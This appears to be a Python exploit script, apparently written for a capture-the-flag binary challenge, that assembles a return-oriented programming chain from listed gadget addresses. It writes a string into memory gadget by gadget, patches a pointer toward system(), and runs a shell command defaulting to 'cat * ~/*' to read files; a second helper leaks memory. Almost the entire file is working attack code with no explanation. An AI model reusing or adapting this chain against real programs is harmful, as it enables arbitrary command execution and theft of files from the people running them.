from struct import pack

"""
UNUSED
------> offset: 0x4019fe
0x4019fe    pop r12
0x401a00    pop r13
0x401a02    pop r14
0x401a04    pop r15
0x401a06    pop rbp
0x401a07    ret


------> offset: 0x4040f1
0x4040f1    pop rsi
0x4040f2    pop r15
0x4040f4    ret


------> offset: 0x40121c
0x40121c    pop rbx
0x40121d    pop rbp
0x40121e    pop r12
0x401220    pop r13
0x401222    ret
"""

def dq(d):
  return pack("<Q", d) 

"""
------> offset: 0x4040f1
0x4040f1    pop rsi
0x4040f2    pop r15
0x4040f4    ret
"""
def ROP_set_rsi_r15(rsi, r15=0):
  o = ""
  o += dq(0x4040f1)
  o += dq(rsi)
  o += dq(r15)
  return o

"""
------> offset: 0x401a05
0x401a05    pop rdi
0x401a06    pop rbp
0x401a07    ret
"""
def ROP_set_rdi_rbp(rdi, rbp=0):
  o = ""
  o += dq(0x401a05)
  o += dq(rdi)
  o += dq(rbp)
  return o


"""
------> offset: 0x404143
0x404143    add rsp, 0x98
0x40414a    ret
"""
def ROP_skip_0x98():
  o = ""
  o += dq(0x404143)
  o += "\0" * 0x98
  return o

"""
0x40179a    pop rbx
0x40179b    pop rbp
0x40179c    ret
"""
def ROP_set_rbx_rbp(rbx, rbp=0):
  o = ""
  o += dq(0x40179a) # pop rbx; pop rbp
  o += dq(rbx)
  o += dq(rbp)
  return o

"""
------> offset: 0x401219
0x401219    mov rax, rbx
0x40121c    pop rbx
0x40121d    pop rbp
0x40121e    pop r12
0x401220    pop r13
0x401222    ret

------> offset: 0x401798
0x401798    mov [rax], bl
0x40179a    pop rbx
0x40179b    pop rbp
0x40179c    ret
"""
def ROP_put_string_in_memory(addr, s):
  o = ""
  o += ROP_set_rbx_rbp(addr)
  addr += 1
  for ch in s:
    o += dq(0x401219) # mov rax, rbx; pop rbx + 3 dq
    o += dq(ord(ch))
    o += dq(0) + dq(0) + dq(0)

    o += dq(0x401798) # mov [rax], bl; pop rbx + 1 dq
    o += dq(addr)
    addr += 1
    o += dq(0)
  return o

"""
at 605280
ff80
ff40
"""

def GiveMeROP(system_low_word, cmd="cat * ~/*"):
  system_low_word = pack("<H", system_low_word)
  o = ""
  o += ROP_skip_0x98()
  o += ROP_put_string_in_memory(0x605280, system_low_word)

  DATA_RW = 0x605500
  o += ROP_put_string_in_memory(DATA_RW, cmd)
  o += ROP_set_rdi_rbp(DATA_RW)
  o += dq(0x400DA0) # ___cxa_atexit
  return o

def LeakStuff(addr = 0x605280):
  # Przeciekajace Ropiszcze
  o = ""
  o += ROP_set_rsi_r15(addr)
  o += dq(0x400F95)
  return o


